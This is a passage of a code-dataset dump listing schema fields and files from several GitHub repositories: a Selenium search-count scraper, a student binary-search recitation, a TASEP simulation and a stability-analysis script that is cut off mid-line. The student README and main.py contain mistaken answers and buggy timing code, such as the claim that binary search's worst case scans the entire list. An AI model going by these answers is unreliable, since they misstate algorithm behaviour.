repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
fanjingwei/observeNewsBroadcastOnInternet
https://github.com/fanjingwei/observeNewsBroadcastOnInternet
c97b5e65838ea057935c721f69213839c944c9ac
c54299081c05f0bf68f7d69b6a1210d4efc3e980
e227a6938d4404f2bdeff743259ff31fae80cf89
refs/heads/master
2020-03-18T17:06:50.125027
2018-05-27T13:47:22
2018-05-27T13:47:22
135,007,013
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6695652008056641, "alphanum_fraction": 0.6739130616188049, "avg_line_length": 20, "blob_id": "4ea9e53cf525b20188110e16a979f1b8699e59b5", "content_id": "956003e077454f7e66560671b5d8c6dc1c70eca2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 37, "num_lines": 11, "path": "/testObserve.py", "repo_name": "fanjingwei/observeNewsBroadcastOnInternet", "src_encoding": "UTF-8", "text": "import unittest\nfrom observe import *\n\nclass ObserveTest(unittest.TestCase):\n\tdef testHotWord(self):\n\t\tstring = observeSina(\"区块链\",5)\n\t\twith open(\"区块链.sina\",'w') as f:\n\t\t\tf.write(string)\n\nif __name__ == '__main__':\n\tunittest.main()" }, { "alpha_fraction": 0.7190366983413696, "alphanum_fraction": 0.7370030283927917, "avg_line_length": 32.126583099365234, "blob_id": "a031dfb12f804365e5efe66a161960002db44629", "content_id": "680f0f360055d9b2a48d802cd6bd1028742e0b62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2684, "license_type": "no_license", "max_line_length": 77, "num_lines": 79, "path": "/testWebSiteIsChanged.py", "repo_name": "fanjingwei/observeNewsBroadcastOnInternet", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\n\nimport unittest\n\nclass WebSiteTest(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.browser = webdriver.Chrome(os.getcwd()+\"/3rdParty/chromedriver.exe\")\n\t\treturn\n\n\tdef tearDown(self):\n\t\tself.browser.close()\n\t\treturn\n\n\tdef testBaiduSearch(self):\n\t\tself.browser.get(\"http://www.baidu.com\")\n\t\tinputElement = self.browser.find_element_by_id(\"kw\")\n\t\tself.assertNotEqual(None, inputElement)\n\t\tinputElement.send_keys(\"范璟玮\")\n\t\tinputElement.send_keys(Keys.RETURN)\n\t\ttime.sleep(1)\n\n\t\tnum = self.browser.find_elements_by_class_name(\"nums_text\")\n\t\tself.assertEqual(1,len(num))\n\t\tsearchTool = self.browser.find_element_by_class_name(\"search_tool\")\n\t\tself.assertNotEqual(None, searchTool)\n\t\tsearchTool.click()\n\t\ttime.sleep(1)\n\n\t\tsearchTool_Time = self.browser.find_element_by_class_name(\"search_tool_tf\")\n\t\tself.assertNotEqual(None, searchTool_Time)\n\t\tsearchTool_Time.click()\n\t\ttime.sleep(1)\n\n\t\tstartTime = self.browser.find_elements_by_name(\"st\")\n\t\tself.assertEqual(1,len(startTime))\n\t\tstartTime[0].clear()\n\t\tstartTime[0].send_keys(\"2015-08-15\")\n\t\tendTime = self.browser.find_elements_by_name(\"et\")\n\t\tself.assertEqual(1,len(endTime))\n\t\tendTime[0].clear()\n\t\tendTime[0].send_keys(\"2015-08-30\")\n\t\tsubmit = self.browser.find_element_by_class_name(\"c-tip-custom-submit\")\n\t\tself.assertNotEqual(None, submit)\n\t\tsubmit.click()\n\t\ttime.sleep(1)\n\n\t\tresults = self.browser.find_elements_by_class_name(\"result\")\n\t\tself.assertEqual(2,len(results))\n\t\tresultNum = self.browser.find_element_by_class_name(\"nums_text\")\n\t\t#该项此时被隐藏,需要使用get_attribute(\"innerHTML\")方式获取\n\t\tself.assertEqual(\"百度为您找到相关结果约2个\",resultNum.get_attribute(\"innerHTML\"))\n\n\tdef testSinaSearch(self):\n\t\tself.browser.get(\"http://search.sina.com.cn/?c=adv\")\n\t\tinputElement = self.browser.find_element_by_name(\"all\")\n\t\tself.assertNotEqual(None, inputElement)\n\t\tinputElement.send_keys(\"区块链\")\n\t\tselectItem = self.browser.find_element_by_name(\"time\")\n\t\tself.assertNotEqual(None, selectItem)\n\t\tSelect(selectItem).select_by_value(\"custom\")\n\t\tstartTime = self.browser.find_element_by_id(\"s_time\")\n\t\tself.assertNotEqual(None, startTime)\n\t\tstartTime.send_keys(\"2018-05-23\")\n\t\tendTime = self.browser.find_element_by_id(\"e_time\")\n\t\tself.assertNotEqual(None, endTime)\n\t\tendTime.send_keys(\"2018-05-24\")\n\t\tsubmit = self.browser.find_element_by_id(\"submit_button\")\n\t\tself.assertNotEqual(None, submit)\n\t\tsubmit.click()\n\t\tr = self.browser.find_element_by_class_name(\"l_v2\")\n\t\tself.assertNotEqual(None, r)\n\n\nif __name__ == '__main__':\n\tunittest.main()" }, { "alpha_fraction": 0.7158458828926086, "alphanum_fraction": 0.7263548374176025, "avg_line_length": 28.065868377685547, "blob_id": "cb3104ca0bfcce01c2700be2149f9207ce59b5ca", "content_id": "e51593e7eae180107e4a5573651a93a472ae0b55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4995, "license_type": "no_license", "max_line_length": 91, "num_lines": 167, "path": "/observe.py", "repo_name": "fanjingwei/observeNewsBroadcastOnInternet", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nfrom datetime import datetime\nfrom datetime import timedelta\n\ndef observeBaidu(key, cycle):\n\tbrowser = webdriver.Chrome(os.getcwd()+\"/3rdParty/chromedriver.exe\")\n\tbrowser.get(\"http://www.baidu.com\")\n\tinputElement = browser.find_element_by_id(\"kw\")\n\tinputElement.send_keys(key)\n\tinputElement.send_keys(Keys.RETURN)\n\ttime.sleep(10)\n\n\tcount = 1\n\tstart,end = getNextCycle(cycle, count)\n\ttryFunctionSomeTime(clickSearchTool, browser, 600)\n\tnum = filterResult(browser,start,end)\n\tstring = \"Key word:\"+ key + \" search by baidu\\n\" + record(start,end,num) + \"\\n\"\n\twhile num > 0:\n\t\tstart,end = getNextCycle(cycle, count)\n\t\tnum = filterResult(browser, start,end)\n\t\tstring+=record(start,end,num)+\"\\n\"\n\t\tprint(record(start,end,num)+\"\\n\")\n\t\ttime.sleep(1)\n\t\tcount+=1\n\tbrowser.close()\n\treturn string\n\ndef getNextCycle(cycle, count):\n\tendDay = datetime.now() - timedelta(days=cycle*(count-1))\n\tstartDay = datetime.now() - timedelta(days=cycle*count)\n\tstart = createDate(startDay)\n\tend = createDate(endDay)\n\treturn start, end\n\ndef createDate(day):\n\tyear = day.year\n\tmonth = day.month\n\td = day.day\n\tif month < 10:\n\t\tmonth = \"0\" + str(month)\n\telse:\n\t\tmonth = str(month)\n\tif d < 10:\n\t\td = \"0\" + str(d)\n\telse:\n\t\td = str(d)\n\treturn str(year)+\"-\"+month+\"-\"+d\n\t\ndef filterResult(browser, start, end):\n\tif not tryFunctionSomeTime(clickTimeFilter, browser, 240):\n\t\treturn 0xffffffff\n\tif not tryFunctionSomeTimeTreeParameters(clickTimeFilterSubmit, browser, start, end, 240):\n\t\treturn 0xffffffff\n\tr,v = tryFunctionSomeTimeWithReturn(getSearchResultNum, browser, 240)\n\tif r:\n\t\treturn v\n\telse:\n\t\treturn 0xffffffff\n\ndef tryFunctionSomeTime(function, parameter, maxTime):\n\tfor i in range(maxTime):\n\t\ttry:\n\t\t\tfunction(parameter)\n\t\texcept:\n\t\t\ttime.sleep(0.5)\n\t\tfinally:\n\t\t\treturn True\n\treturn False\n\ndef tryFunctionSomeTimeWithReturn(function, parameter, maxTime):\n\tfor i in range(maxTime):\n\t\ttry:\n\t\t\treturn True, function(parameter)\n\t\texcept:\n\t\t\ttime.sleep(0.5)\n\treturn False, None\n\ndef tryFunctionSomeTimeTreeParameters(function, para1, para2, para3, maxTime):\n\tfor i in range(maxTime):\n\t\ttry:\n\t\t\tfunction(para1, para2, para3)\n\t\texcept:\n\t\t\ttime.sleep(0.5)\n\t\tfinally:\n\t\t\treturn True\n\treturn False\n\ndef clickSearchTool(browser):\n\tsearchTool = browser.find_element_by_class_name(\"search_tool\")\n\tif not searchTool.is_displayed():\n\t\tsearchTool = undefineWord#不可见时也能查到,因此此时要主动造成异常,等待其可见\n\tsearchTool.click()\n\treturn\n\ndef clickTimeFilter(browser):\n\tsearchTool_Time = browser.find_element_by_class_name(\"search_tool_tf\")\n\tif not searchTool_Time.is_displayed():\n\t\tsearchTool_Time = undefineWord#不可见时也能查到,因此此时要主动造成异常,等待其可见\n\tsearchTool_Time.click()\n\treturn\n\ndef clickTimeFilterSubmit(browser, start, end):\n\tstartTime = browser.find_element_by_name(\"st\")\n\tstartTime.clear()\n\tstartTime.send_keys(start)\n\tendTime = browser.find_element_by_name(\"et\")\n\tendTime.clear()\n\tendTime.send_keys(end)\n\tsubmit = browser.find_element_by_class_name(\"c-tip-custom-submit\")\n\tsubmit.click()\n\ndef getSearchResultNum(browser):\n\tresultNum = browser.find_element_by_class_name(\"nums_text\")\n\tresult = resultNum.get_attribute(\"innerHTML\")\n\tstartPos = len('百度为您找到相关结果约')\n\tendPos = result.find('个')\n\treturn int(result[startPos:endPos].replace(',',\"\"))\n\ndef grabNumFromString(string, startStr, endStr):\n\tstartPos = len(startStr)\n\tendPos = string.find(endStr)\n\treturn int(string[startPos:endPos].replace(',',\"\"))\n\ndef record(start, end, num):\n\treturn start + \"~\" + end + \":\" + str(num)\n\ndef observeSina(key, cycle):\n\tbrowser = webdriver.Chrome(os.getcwd()+\"/3rdParty/chromedriver.exe\")\n\tcount = 1\n\tstart,end = getNextCycle(cycle, count)\n\tnum = oneSinaSearch(browser, key, start, end)\n\tcount+=1\n\tstring = \"Key word:\"+ key + \" search by sina\\n\" + record(start,end,num) + \"\\n\"\n\twhile num > 0:\n\t\tstart,end = getNextCycle(cycle, count)\n\t\tnum = oneSinaSearch(browser, key, start, end)\n\t\tstring+=record(start,end,num)+\"\\n\"\n\t\tprint(record(start,end,num))\n\t\tcount+=1\n\t\ttime.sleep(1)\n\tbrowser.close()\n\treturn string\n\ndef oneSinaSearch(browser, key, start, end):\n\tbrowser.get(\"http://search.sina.com.cn/?c=adv\")\n\tinputElement = browser.find_element_by_name(\"all\")\n\tinputElement.send_keys(key)\n\tselectItem = browser.find_element_by_name(\"time\")\n\tSelect(selectItem).select_by_value(\"custom\")\n\tstartTime = browser.find_element_by_id(\"s_time\")\n\tstartTime.send_keys(start)\n\tendTime = browser.find_element_by_id(\"e_time\")\n\tendTime.send_keys(end)\n\ttime.sleep(1)\n\tsubmit = browser.find_element_by_id(\"submit_button\")\n\tsubmit.click()\n\tresult = browser.find_element_by_class_name(\"l_v2\")\n\tnum = int(grabNumFromString(result.text, \"找到相关新闻\", \"篇\"))\n\tmod_bar = browser.find_element_by_class_name(\"mod_bar\")\n\tif 0 == len(mod_bar.find_elements_by_class_name(\"close\")):\n\t\treturn num\n\telse:\n\t\treturn 0" } ]
3
allan-tulane/recitation-01-hduece
https://github.com/allan-tulane/recitation-01-hduece
67b6eb0b6e293e632d1b7d670f9302779ad91f80
2f9330e114ba906d797fe241ffdf2de0bb940659
6c253d22ab4dd85b8cccadf3c1d328a00d7b8916
refs/heads/main
2023-02-23T23:23:04.131511
2021-02-01T03:53:09
2021-02-01T03:53:09
333,800,782
0
0
null
2021-01-28T15:30:08
2021-01-28T15:30:17
2021-01-28T15:30:17
Python
[ { "alpha_fraction": 0.6872079372406006, "alphanum_fraction": 0.7441588640213013, "avg_line_length": 78.6279067993164, "blob_id": "3e773d30d209f437fd2798bd42c3052827cc0459", "content_id": "cdd9fc866cd692ef179813e3aca0603e50c6d1e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6848, "license_type": "no_license", "max_line_length": 420, "num_lines": 86, "path": "/README.md", "repo_name": "allan-tulane/recitation-01-hduece", "src_encoding": "UTF-8", "text": "[![Work in Repl.it](https://classroom.github.com/assets/work-in-replit-14baed9a392b3a25080506f3b7b6d57f295ec2978f6f33ec97e36a161684cbe9.svg)](https://classroom.github.com/online_ide?assignment_repo_id=3989531&assignment_repo_type=AssignmentRepo)\n# CMPS 2200 Recitation 01\n\n**Names (Team Members):** Hailey Dusablon, Abe Messing, Shengkai Qin, Alexis Preston, Daniel Ellsworth \n\n\nIn this recitation, we will investigate asymptotic complexity. Additionally, we will get familiar with the various technologies we'll use for collaborative coding.\n\nTo complete this recitation, follow the instructions in this document. Some of your answers will go in this file, and others will require you to edit `main.py`.\n\n\n## Setup\n- Make sure you have a Github account.\n- Login to Github.\n- Login to repl.it, using \"sign in with github\"\n- Click on the assignment link sent through canvas and accept the assignment. \n- Click on your personal github repository for the assignment (e.g., https://github.com/allan-tulane/recitation-01-your_username).\n- Click on the \"Work in Repl.it\" button. This will launch an instance of `repl.it` initialized with the code from your repository.\n- You'll work with a partner to complete this recitation. To do so, we'll break you into Zoom rooms. You will be able to code together in the same `repl.it` instance. You can choose whose repl.it instance you will share. This person will click the \"Share\" button in their repl.it instance and email the lab partner.\n\n## Running and testing your code\n- In the command-line window, run `./ipy` to launch an interactive IPython shell. This is an interactive shell to help run and debug your code. Any code you change in `main.py` will be reflected from this shell. So, you can modify a function in `main.py`, then test it here.\n + If it seems things don't refresh, try running `from main import *`\n- You can exit the IPython prompt by either typing `exit` or pressing `ctrl-d`\n- To run tests, from the command-line shell, you can run\n + `pytest main.py` will run all tests\n + `pytest main.py::test_one` will just run `test_one`\n + We recommend running one test at a time as you are debugging.\n\n## Turning in your work\n\n- Once complete, click on the \"Version Control\" icon in the left pane on repl.it.\n- Enter a commit message in the \"what did you change?\" text box\n- Click \"commit and push.\" This will push your code to your github repository.\n- Although you are working as a team, please have each team member submit the same code to their repository. One person can copy the code to their repl.it and submit it from there.\n\n## Comparing search algorithms\n\nWe'll compare the running times of `linear_search` and `binary_search` empirically.\n\n- [ ] 1. In `main.py`, the implementation of `linear_search` is already complete. Your task is to implement `binary_search`. Implement a recursive solution using the helper function `_binary_search`. \n\n- [ ] 2. Test that your function is correct by calling from the command-line `pytest main.py::test_binary_search`\n\n- [ ] 3. Write at least two additional test cases in `test_binary_search` and confirm they pass.\n\n- [ ] 4. Describe the worst case input value of `key` for `linear_search`? for `binary_search`? \n\n**TODO: The worst case input value for linear search is a value that is not in the list because it will have to search through the entire list to determine that it is not there. The worst case value for binary search is also a value that is not in the list because it will have to search through the entire list to determine that it is not there, though it directly searched through less values than the linear search.**\n\n- [ ] 5. Describe the best case input value of `key` for `linear_search`? for `binary_search`? \n\n**TODO: For linear search, the best case input value is the first value in the list because it will only have to run one time. For binary search, the value in the middle of the list is the best case input value as it is the first one to be compared to the key. **\n\n- [ ] 6. Complete the `time_search` function to compute the running time of a search function. Note that this is an example of a \"higher order\" function, since one of its parameters is another function.\n\n- [ ] 7. Complete the `compare_search` function to compare the running times of linear search and binary search. Confirm the implementation by running `pytest main.py::test_compare_search`, which contains some simple checks.\n\n- [ ] 8. Call `print_results(compare_search())` and paste the results here:\n\n**TODO:Running this code in main gave us an error in code given to us by the lab., which I have pasted below.**\nmain.py:89: in <module>\n print_results(compare_search())\nmain.py:74: in print_results\n print(tabulate.tabulate(results,\n/opt/virtualenvs/python3/lib/python3.8/site-packages/tabulate.py:1426: in tabulate\n list_of_lists, headers = _normalize_tabular_data(\n/opt/virtualenvs/python3/lib/python3.8/site-packages/tabulate.py:1103: in _normalize_tabular_data\n rows = list(map(list, rows))\nE TypeError: 'float' object is not iterable\n=========================== short test summary info ============================\nERROR main.py - TypeError: 'float' object is not iterable\n!!!!!!!!!!!!!!!!!!!! Interrupted: 1 error during collection !!!!!!!!!!!!!!!!!!!!\n\n**The print out of our results tuple is pasted here, as I believe it is closer to the intended answer for this question.**\n[10.0, 0.0030994415283203125, 0.0057220458984375, 100.0, 0.0019073486328125, 0.003814697265625, 1000.0, 0.0016689300537109375, 0.00286102294921875, 10000.0, 0.0019073486328125, 0.003337860107421875, 100000.0, 0.0019073486328125, 0.0030994415283203125, 1000000.0, 0.0021457672119140625, 0.00286102294921875, 10000000.0, 0.001430511474609375, 0.0035762786865234375]\n\n\n- [ ] 9. The theoretical worst-case running time of linear search is $O(n)$ and binary search is $O(log_2(n))$. Do these theoretical running times match your empirical results? Why or why not?\n\n**TODO: Not exactly. This does not match the big O analysis, because there are not enough iterations for us to see the difference and big O is based on worst case time complexity. However, if the lists we are searching were much longer, it would be more likely we notice the predicted runtime differences.**\n\n- [ ] 10. Binary search assumes the input list is already sorted. Assume it takes $\\Theta(n^2)$ time to sort a list of length $n$. Suppose you know ahead of time that you will search the same list $k$ times. \n + What is worst-case complexity of searching a list of $n$ elements $k$ times using linear search? **TODO: O(nk) **\n + For binary search? **TODO: O(n^2) + O(logn * k) = O(n^2 + (logn \\* k))**\n + For what values of $k$ is it more efficient to first sort and then use binary search versus just using linear search without sorting? **TODO: It makes sense to sort and use binary search when k > n.**\n" }, { "alpha_fraction": 0.5666842460632324, "alphanum_fraction": 0.623089075088501, "avg_line_length": 20.79310417175293, "blob_id": "f21c059be2d6e62599cb72e4b9a3c53d917c78ef", "content_id": "c2871143a67ac6e215eb25c88efbfe757ed51f21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1897, "license_type": "no_license", "max_line_length": 62, "num_lines": 87, "path": "/main.py", "repo_name": "allan-tulane/recitation-01-hduece", "src_encoding": "UTF-8", "text": "\"\"\"\nCMPS 2200 Recitation 1\n\"\"\"\n\n### the only imports needed are here\nimport tabulate\nimport time\n###\n\ndef linear_search(mylist, key):\n\t\"\"\" done. \"\"\"\n\tfor i,v in enumerate(mylist):\n\t\tif v == key:\n\t\t\treturn i\n\treturn -1\n\ndef test_linear_search():\n\t\"\"\" done. \"\"\"\n\tassert linear_search([1,2,3,4,5], 5) == 4\n\tassert linear_search([1,2,3,4,5], 1) == 0\n\tassert linear_search([1,2,3,4,5], 6) == -1\n\ndef binary_search(mylist, key):\n\t\"\"\" done. \"\"\"\n\treturn _binary_search(mylist, key, 0, len(mylist)-1)\n\ndef _binary_search(mylist, key, left, right):\n\n\twhile left <= right:\n\t\tmiddle = (left+right)//2\n\t\tif mylist[middle] == key:\n\t\t\treturn middle\n\t\telif mylist[middle] > key:\n\t\t\treturn _binary_search(mylist,key,left,middle-1)\n\t\telif mylist[middle] < key:\n\t\t\treturn _binary_search(mylist,key,middle+1,right)\n\treturn -1\n\ndef test_binary_search():\n\tassert binary_search([1,2,3,4,5], 5) == 4\n\tassert binary_search([1,2,3,4,5], 1) == 0\n\tassert binary_search([1,2,3,4,5], 6) == -1\n\t### TODO: add two more tests here.\n\t###\n\tassert binary_search([1,2], 5) == -1\n\tassert binary_search([], 2) == -1\n\ndef time_search(search_fn, arr, key):\n\tstart_time1 = time.time()\n\tsearch_fn(arr, key,)\n\tend_time1 = time.time()\n\n\tfinal_time1 = (end_time1 - start_time1)*1000\n\n\treturn final_time1\n\t\n\t### TODO\n\t###\n\ndef compare_search(sizes=[1e1, 1e2, 1e3, 1e4, 1e5, 1e6, 1e7]):\n\tkey = -1\n\tresults = []\n\tfor i in sizes:\n\t\tline = time_search(linear_search, sizes, -1)\n\t\tbinary = time_search(binary_search, sizes, -1)\n\t\tresults += (i, line, binary)\n\treturn results\n\n\t### TODO\n\t###\n\ndef print_results(results):\n\t\"\"\" done \"\"\"\n\tprint(tabulate.tabulate(results,\n\t\t\t\t\t\t\theaders=['n', 'linear', 'binary'],\n\t\t\t\t\t\t\tfloatfmt=\".3f\",\n\t\t\t\t\t\t\ttablefmt=\"github\"))\n\n\ndef test_compare_search():\n\tres = compare_search(sizes=list(range(10, 100)))\n\tprint(res)\n\n\tassert res[0] == 10\n\t#assert res[1][0] == 100\n\t#assert res[0][1] < 1\n\t#assert res[1][1] < 1py\n\n" } ]
2
AlexMilog/norway
https://github.com/AlexMilog/norway
d578c553f0fe15287e2ad4e7bfda4b1a8cd4c879
6f25ad673b9b2047ba2b51b4a96c1b8abe3c7b71
0ac531e6a70390782cd3c4ed4e16ef2d6acbd9af
refs/heads/main
2023-01-06T17:10:50.629502
2020-11-06T19:34:01
2020-11-06T19:34:01
301,002,925
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.38091331720352173, "alphanum_fraction": 0.4137271046638489, "avg_line_length": 40.034481048583984, "blob_id": "fa3fe5be42d1ffe72825ca1e3169efed93a1aab9", "content_id": "65cf209e3d452d5873d15a9053e2d3e21f9b49ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3657, "license_type": "no_license", "max_line_length": 110, "num_lines": 87, "path": "/TASEP model.py", "repo_name": "AlexMilog/norway", "src_encoding": "UTF-8", "text": "import numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nN1, N2, N3 = 100, 200, 100\r\nL = N1 + N2 + N3\r\nlifetime = 1000\r\nrealizations = 10\r\nstartpoint = 0\r\nstep, endpoint = 0.1, 1.1\r\nro_range = np.arange(startpoint, endpoint, step)\r\n#c0_range = [5, 10, 20, 50, 100, 150]\r\nc0_range = [5]\r\n\r\n\r\ndef swap(listt, pos1, pos2):\r\n listt[pos1], listt[pos2] = listt[pos2], listt[pos1]\r\n return listt\r\n\r\n\r\nfor c0 in c0_range:\r\n print(c0)\r\n c = c0 / N2\r\n output = []\r\n inputt = []\r\n for ro in ro_range:\r\n current_counter = 0\r\n ro_zero = 0\r\n print('ro = ', f'{ro:.2f}')\r\n for realization in range(realizations):\r\n print('realization = ', realization)\r\n rna = np.zeros((L,), dtype=np.int)\r\n for t in range(lifetime):\r\n filled = []\r\n for i in range(len(rna)):\r\n if rna[i] != 0:\r\n filled.append(i)\r\n if filled:\r\n insertion = np.random.choice(np.arange(len(filled)))\r\n for i in range(len(filled)):\r\n if not filled:\r\n continue\r\n choice = np.random.choice(filled)\r\n e_prob = np.random.uniform(0, 1)\r\n if insertion == i:\r\n p = np.random.uniform(0, 1)\r\n if p <= ro and rna[0] == 0:\r\n rna[0] = 1\r\n if choice != N1 - 1 and choice != L - 1 and rna[choice] == 1 and rna[choice + 1] == 0:\r\n swap(rna, choice, choice + 1)\r\n del filled[filled.index(choice)]\r\n elif choice != N1 + N2 - 1 and rna[choice] == 2 and rna[choice + 1] == 0:\r\n swap(rna, choice, choice + 1)\r\n del filled[filled.index(choice)]\r\n elif choice == N1 - 1 and e_prob <= c and rna[choice + 1] == 0:\r\n swap(rna, choice, choice + 1)\r\n rna[choice + 1] = 2\r\n del filled[filled.index(choice)]\r\n elif choice == N1 - 1 and e_prob > c and rna[choice + 1] == 0:\r\n swap(rna, choice, choice + 1)\r\n del filled[filled.index(choice)]\r\n elif choice != N1 + N2 - 1 and rna[choice] == 2 and rna[choice + 1] == 1:\r\n swap(rna, choice, choice + 1)\r\n rna[choice] = 0\r\n del filled[filled.index(choice)]\r\n del filled[filled.index(choice + 1)]\r\n elif choice == N1 + N2 - 1 and rna[choice] == 2:\r\n rna[choice] = 0\r\n del filled[filled.index(choice)]\r\n elif choice == L - 1:\r\n rna[choice] = 0\r\n current_counter += 1\r\n del filled[filled.index(choice)]\r\n else:\r\n p = np.random.uniform(0, 1)\r\n if p <= ro and rna[0] == 0:\r\n rna[0] = 1\r\n if rna[0] == 1:\r\n ro_zero += 1\r\n ro_zero = ro_zero / (realizations * lifetime)\r\n inputt.append(ro_zero)\r\n current_counter = current_counter/(2*realizations * lifetime)\r\n output.append(current_counter)\r\n print(inputt)\r\n print(output)\r\n plt.plot(inputt, output, 'ro')\r\n plt.xlim(0, 1)\r\n plt.show()\r\n" }, { "alpha_fraction": 0.45026302337646484, "alphanum_fraction": 0.5111093521118164, "avg_line_length": 30.605459213256836, "blob_id": "8bbc4d890c6fbee96b08433d524bc45b369b76a4", "content_id": "cdaa4e19beac6ff04e9238330ced1efc1b079aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12737, "license_type": "no_license", "max_line_length": 117, "num_lines": 403, "path": "/stability_analysis.py", "repo_name": "AlexMilog/norway", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button\nfrom matplotlib.ticker import FuncFormatter\nimport numpy as np\n\n\ndef my_formatter(x, pos):\n if x.is_integer():\n return str(int(x))\n else:\n return str(round(x, 3))\n\n\nformatter = FuncFormatter(my_formatter)\n\nwpred = np.array([0., 0., 0., 0.])\nspred = 0\narrayofs = [spred]\n\n\ndef vectorfield(w, t, p):\n global wpred\n global spred\n global arrayofs\n\n x1, x2, x3, x4 = w\n smallk, bigk, delta = p\n if t == 0:\n stop = spred\n else:\n stop = min(1.0, max(-1.0, (w[0] - w[1]) - (wpred[0] - wpred[1]) + spred))\n f = smallk * (x1 - x2) + stop\n func = np.array([x3, x4, -f - x2 * bigk, f - x4 * delta])\n\n wpred = w\n spred = stop\n arrayofs.append(stop)\n\n return func\n\n\ndef syssolver(func, x0, t, p, dt):\n global arrayofs\n arrayofs = [spred]\n ans = [x0]\n for i in range(len(t)):\n ans.append(ans[-1] + dt * func(ans[-1], i, p))\n return ans\n\n\nbigk = 10\ndelta = 0.5\nsmallk = 10\nsols = [spred]\n\nif spred == 0:\n coeffs = [1, delta, 2 * smallk, smallk * delta, smallk * bigk]\n eigs = np.roots(coeffs)\nelse:\n coeffs = [1, delta, 2 * (smallk + 1), (smallk + 1) * delta, (smallk + 1) * bigk]\n eigs = np.roots(coeffs)\n\nstoptime = 5000\nnumpoints = stoptime*50\n\nt = [stoptime * float(i) / float(numpoints - 1) for i in range(numpoints)]\np = [smallk, bigk, delta]\nw0 = wpred\nwsol = syssolver(vectorfield, w0, t, p, (t[1] - t[0]) / 10.0)\n\nfig, ax = plt.subplots(1, 2)\nplt.subplots_adjust(left=0.1, bottom=0.3)\n\nsolx = []\nfor i in range(0, len(wsol)):\n solx.append(wsol[i][0] - wsol[i][1])\n\nx1_sol = []\nx2_sol = []\n\nfor n in range(len(t)):\n x1_sol.append(wsol[n][0])\n x2_sol.append(wsol[n][1])\n\n#sols = [0]\nfor i in range(0, len(wsol) - 1):\n sols.append(arrayofs[i])\n\nl, = ax[0].plot(solx, sols, lw=1)\nl1, = ax[0].plot(solx[0], sols[0], 'ro')\nplt.xticks(fontsize=15)\nplt.yticks(fontsize=15)\nl2, = ax[1].plot(x1_sol, x2_sol, lw=2)\n#l2, = ax[1].plot(wsol[2], wsol[3], lw=2)\neq1 = -sols[-1] / smallk\nl4, = ax[1].plot(eq1, 0, 'kX', lw=2)\nll = -1 / smallk\nrl = -ll\nl5, = ax[1].plot(ll, 0, '>m', lw=3)\nl6, = ax[1].plot(rl, 0, '<m', lw=2)\nl7, = ax[1].plot(x1_sol[-1], x2_sol[-1], 'rx', lw=2)\nl8, = ax[1].plot(w0[0], w0[1], 'ro')\ncases = ['$k+1 < K$', '$k < K < k+1$', '$K < k$', '$K = k$', '$K = k + 1$']\nif bigk > smallk + 1:\n case = cases[0]\nelif smallk < bigk < smallk + 1:\n case = cases[1]\nelif bigk < smallk:\n case = cases[2]\nelif bigk == smallk:\n case = cases[3]\nelif bigk == smallk + 1:\n case = cases[4]\n\n\nsigns = [' + ', ' ']\nif eigs[0].imag > 0:\n sign1 = signs[0]\nelse:\n sign1 = signs[1]\n\nif eigs[1].imag > 0:\n sign2 = signs[0]\nelse:\n sign2 = signs[1]\n\nif eigs[2].imag > 0:\n sign3 = signs[0]\nelse:\n sign3 = signs[1]\n\nif eigs[3].imag > 0:\n sign4 = signs[0]\nelse:\n sign4 = signs[1]\n\nif np.sqrt(wsol[0][-1] ** 2 + wsol[1][-1] ** 2) > 5:\n limit_x1 = '$\\infty$'\n limit_x2 = '$\\infty$'\nelse:\n limit_x1 = str(round(wsol[0][-1], 3))\n limit_x2 = str(round(wsol[1][-1], 3))\n\ntxt = ax[1].annotate('$\\delta$ = ' + str(round(delta, 2)) + '\\n'\n 'Init. condits.: (' + str(round(w0[0], 3)) + ', ' + str(\n round(w0[1], 3)) + ', ' + str(round(w0[2], 3)) + ', ' + str(round(w0[3], 3)) + ', $s_0:$ ' + str(\n round(arrayofs[0], 4)) + ')\\n'\n ' Eq. point: (' + str(\n round(-sols[-1] / float(smallk),\n 3)) + ', 0, 0, 0)\\n' + 'Limit point: (' + limit_x1 + ', ' + limit_x2 + ', 0, 0)\\n' +\n 'k = ' + str(smallk) + ', K = ' + str(bigk) + '\\n' +\n case + '\\n' +\n '$\\lambda_1 = $' + str(\n round(eigs[0].real, 2)) + sign1 + str(round(eigs[0].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_2 = $' + str(\n round(eigs[1].real, 2)) + sign2 + str(round(eigs[1].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_3 = $' + str(\n round(eigs[2].real, 2)) + sign3 + str(round(eigs[2].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_4 = $' + str(\n round(eigs[3].real, 2)) + sign4 + str(round(eigs[3].imag, 2)) + ' $\\cdot$ $i$', xy=(1, 1), xytext=(-15, -15),\n 